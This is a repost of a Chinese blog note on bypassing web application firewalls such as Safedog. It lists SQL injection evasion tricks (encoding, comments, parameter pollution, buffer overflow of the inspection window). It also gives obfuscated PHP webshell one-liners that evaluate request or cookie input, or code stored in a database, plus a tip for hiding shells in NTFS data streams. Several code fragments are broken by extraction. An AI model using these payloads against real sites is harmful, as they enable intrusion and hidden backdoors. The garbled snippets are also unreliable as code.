返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >bypass绕WAF
  • 770
分享到

bypass绕WAF

安全php开发语言web安全 2023-09-25 11:09:29 770人浏览 薄情痞子
摘要

注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!! WAF:         WEB应用防护系统(网站应用级防御系统)         waf会拦截恶意传参,但并不是所有的拦截都是waf干的        

注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!

WAF:

        WEB应用防护系统(网站应用级防御系统)

        waf会拦截恶意传参,但并不是所有的拦截都是waf干的

        硬件waf、软件waf、云waf

WAF检测机制的核心就是正则表达式

测试环境

系统:win2008R2

最新版安全狗:

一、常见绕WAF手法

Bypass  SQL

大小写绕过(很老的waf才有用)

替换绕过

特殊字符绕过(%0a换行)        \sleep()        \updataxml()

编码绕过(利用检测机制的不同,通过编码绕过)

等价替换(利用其他函数替换         

        注释                数据库中是注释的意思

        内联注释                当数据库版本大于5001执行

容器特征(apche的hpp、或者是iis的%分割)

        iis传参里面 s%e%l%e%c%t   =>  select 

        apche参数污染,传两个参数,以后一个参数为准

                id=PHPinfo()

白名单(管理员权限或者是127.0.0.1本地不拦截、文件后缀名)

缓冲区(数据太多超过waf检测范围)

        安全狗一般检测4000个

        ?id= 1 uNIOn select 1,2,3,4

二、绕WAF写码

Bypass  webshell

        非常的难以置信,这个竟然没有拦截

 4、变量覆盖绕过

php          $a="ev";       $b="al";       $c=$a$b;       $d="c";

          $$d($_REQUEST[8]);        ?>

函数绕过

魔术方法绕过

name");          }       }    $user = new User();      $user->name="$_REQUEST[8]";  ?>

类方法绕过

foreach($COOKIE  as   $key=> $value){

        if($key=='eval'){

                $key($REQUEST[8])       

        }

}?>

内置函数

$a=get_defined_functions();

$a[internal][841]($_REQUEST[1])

?>

绕WAF终极手法,连接外部数据库hjw,获取info表中的第一行数据eval($_REQUEST[8])

eval(Mysqli_fetch_assoc(mysqli_query(mysql_connect('127.0.0.1','root','root','hjw123'),'select * from info'))['info'])        //键为info的地方

?>

拿到shell之后藏shell的妙招ntf文件流

        一、echo ""  >>  /:123.txt

        二、

来源地址:https://blog.csdn.net/qq_58000413/article/details/127524510

--结束END--

本文标题: bypass绕WAF

本文链接: https://lsjlt.com/news/417308.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • bypass绕WAF
    注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!! WAF:         web应用防护系统(网站应用级防御系统)         waf会拦截恶意传参,但并不是所有的拦截都是waf干的         ...
    99+
    2023-09-25
    安全 php 开发语言 web安全
  • 文件上传之,waf绕过(24)
    上传参数名解析:明确哪些东西可以修改 content-disposition:一般可更改    表单的数据  name:表单参数值,不能更改    表单提交的值 filename:文件名,可以修改    上传的文件名 content-typ...
    99+
    2023-09-04
    html 前端
  • 实战绕过WTS-WAF的SQL注入
    实战绕过WTS-WAF的SQL注入 1.前言2.测试流程2.1.发现漏洞2.1.1.正常页面2.1.2.WAF警告2.1.3.非正常页面 2.2.判断字段数2.2.1.非正常页面2.2....
    99+
    2023-09-10
    数据库 mysql web安全 网络安全 信息与通信
  • 利用工具改造webshell绕过WAF
    今天继续给大家介绍渗透测试相关知识,本文主要内容是利用工具改造webshell绕过WAF。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! ...
    99+
    2023-09-04
    php webshell PHP加密 渗透测试 web安全
  • 文件上传—WAF拦截的绕过方式
    文件上传—WAF拦截的绕过方式     我们常用的黑名单绕过方法也适用于部分waf,更多的是需要配合使用才能成功上传,主要思路为接收文件名和waf的检测有所差异,只要是服务器能接收并解析,怎样能绕过...
    99+
    2023-09-01
    网络安全 web安全 php 系统安全 安全
  • XSS现代WAF规则探测及绕过技术是怎样的
    XSS现代WAF规则探测及绕过技术是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。初始测试1、使用无害的payload,类似<b>,<i>,<...
    99+
    2023-06-17
  • WAF是什么?一篇文章带你全面了解WAF
    WAF是什么?一篇文章带你全面了解WAF 文章目录 WAF是什么?一篇文章带你全面了解WAFWAF是什么?一、WAF的工作原理二、WAF的分类三、WAF的特点四、如何选择和部署WAF WAF是什么? Web应用程序防火墙(W...
    99+
    2023-08-21
    服务器 前端 网络 安全 web安全
  • 阿里云waf 代理
    使用waf代理的优点 节省成本:使用waf代理可以在不影响应用程序运行的情况下,快速部署和管理多个云服务器。 安全性高:waf代理可以通过网络隔离,确保云服务器的安全性。 部署方便:使用waf代理可以快速部署应用程序,并且可以随时根据需...
    99+
    2023-10-28
    阿里 waf
  • __wakeup()绕过
    PHP5...
    99+
    2023-09-06
    php
  • nginx_host绕过
    目录 一、LNMP环境搭建 1、nginx的基础配置 2、将域名与IP映射的关系添加到hosts文件 3、上传pwnhub文件 4、给/usr/local/nginx/html/xjl/protected/tmp赋予权限 二、配置数据库My...
    99+
    2023-09-11
    nginx php 运维
  • 绕过disable_function
    绕过disable_functions 先看有没有一些忘了ban的命令函数利用pcntl_execPHP安装并且启用了pcntl插件利用LD_PRELOAD环境变量 能上传自己的.so文件 ...
    99+
    2023-09-08
    apache php web安全
  • PHPwebshell2022免杀bypass阿里云盾等所有安全设备
    直接上代码 已经提过了长亭的牧云webshell检测平台,所以直接开源 绕过原理,一些CTF的小技巧 使用反序列化,外加php原生类绕过检测,到达webshell免杀 关键代码 echo new $sizeclass($filepath);...
    99+
    2023-09-03
    php 开发语言 网络安全 安全
  • 阿里云WAF的QPS是什么的缩写?
    阿里云WAF(Web Application Firewall)是一款提供网站安全防护的云服务产品,其QPS(Query Per Second)是什么的缩写?本文将为您详细解答。 详细说明:阿里云WAF的QPS(Query Per Seco...
    99+
    2024-06-03
    阿里 缩写 WAF
  • 文件上传漏洞基础/::$DATA绕过上传/叠加特征绕过/双写绕过
    一、NTFS交换数据流::$DATA绕过上传 如果后缀名没有对::$DATA进行判断,利用windows系统NTFS特征可以绕过上传 在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀...
    99+
    2023-10-05
    php 安全 开发语言 web安全 网络安全
  • [xss-3]httponly绕过
    什么是HttpOnly HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnl...
    99+
    2023-09-02
    web web安全
  • android frida检测绕过
    Frida检测是一种常见的安卓逆向技术,常用于防止应用程序被反向工程。如果您遇到了Frida检测,您可以尝试以下方法来绕过它: 使用Magisk Hide模块:Magisk是一个强大的安卓root工具,它附带了一个Magisk Hide模...
    99+
    2023-08-31
    android frida hook
  • Nginx使用Lua模块实现WAF的原理解析
    目录一、WAF产生的背景二、什么是WAF三、工作原理四、WAF作用五、WAF和传统防火墙的区别六、WAF和DDos七、Nginx WAF功能八、Nginx Waf防护流程九、基于Ng...
    99+
    2024-04-02
  • python编写WAF与Sqlmap结合实现指纹探测
    目录编写探测识别WAF脚本00x1:WAF的特征00x2:测试00x3:收集wafPyhacker 之 编写SQLMAP Waf探测使用Python编写探测WAF指纹脚本,再结合到S...
    99+
    2024-04-02
  • 美国服务器WAF硬件有哪些优缺点
    美国服务器WAF硬件的优缺点如下: 优点: 高性能:硬件WAF可以提供更高的性能和吞吐量,能够有效应对高流量的网络环境。 安全性:...
    99+
    2024-04-03
    美国服务器 服务器
  • 文件上传漏洞基础/htaccess重写解析绕过/大小写绕过上传/windows特性绕过
    目录 一、htaccess重写解析绕过上传 htaccess文件 htaccess文件上传 靶场练习pass-04 代码分析 创建.htaccess文件 开始上传 访问 二、大小写绕过 upload-labs pass-05 代码分析 上...
    99+
    2023-09-02
    安全 web安全 网络安全 php
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作